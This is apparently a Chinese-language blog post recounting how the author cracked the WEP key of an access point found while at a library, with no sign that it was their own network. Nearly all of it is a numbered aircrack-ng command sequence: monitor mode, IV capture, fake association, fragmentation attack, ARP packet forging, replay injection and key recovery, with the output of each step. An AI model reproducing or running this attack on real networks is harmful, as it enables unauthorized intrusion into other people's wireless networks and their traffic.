這次實驗有一點奇怪,一早到了圖書館,就先進行查看周遭網路情況。
一,開始在第一個terminal
1.airmon-ng start waln0
a.開啟監控界面。
2.airodump-ng --encry wep mon0
a.查看各頻道以wep編碼的ap
b.發現有一個ap的data值有在緩慢地增加到4,表示有連網行為。
c.決定鎖定該ap。
3.airodump-ng --bssid [ap's mac] -c 3 --ivs -w cas mon0
a.以mon0監控界面在第三頻道蒐集該ap的ivs包,寫入cas-01.ivs中。
二,開啟第二terminal
1.export AP=[ap's mac]
2.ifconfig -a
a.查看自己的mac
3.export MAC=[own mac]
4.aireplay-ng -1 0 -a $AP -h $MAC mon0
a.進行第一號攻擊,試圖與ap交手。(association)
b.若成功,顯示:Association successful :-) (AID: 1)
c.這時查看terminal 1,會發現自己已成為ap's client。
5.iwconfig mon0 channel 3
a.確保mon0是在第三頻道。
6.aireplay-ng -5 -b $AP -h $MAC mon0
a.採第五號攻擊。
b.原本在airodump時,並沒有看到有ap's client在線,所以在此進行第五號攻擊時,並不抱持太大希望;沒想到,僅用了三次packet,就Got RELAYED packet!!
c.再轉回terminal 1看,竟然出現了一個client。本尊現身了!
7.packetforge-ng -0 -a $AP -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-1104-085701.xor -w myarp
a.將所得的xor檔轉成arp檔。
8.aireplay-ng -2 -r myarp -x 1024 mon0
a.進行第二號攻擊。
b.讀取arp的資料,以每秒1024bit的速度從監控界面mon0送出。
9.Use this packet ? y
Saving chosen packet in replay_src-1104-085916.cap
a.這時,terminal 1中的data開始穩定地向上增長。
三,開啟第三個terminal
1.aircrack-ng -n 64 -b [ap's mac] cas-01.ivs
a.開始對所蒐集到的ivs以密碼長度64 bits格式進行破解。
b.這時已抓了Starting PTW attack with 44256 ivs,想說馬上就可輕鬆破解。誰知道...
c.Tested 422829 keys (got 237482 IVs)到了23萬多個ivs都還破不了。這可奇了!
2.aircrack-ng -s -b [ap's mac] cas-01.ivs
a.決定停掉,重新再破解一次。這次不限定在64 bits長度的格式了,並加上-s參數,當得出金鑰時,可顯示ascii code。
b.結果,一試就成。
3.airmon-ng stop mon0
a.最後,得到金鑰後別太高興,記得再把監控界面停掉。
沒有留言:
張貼留言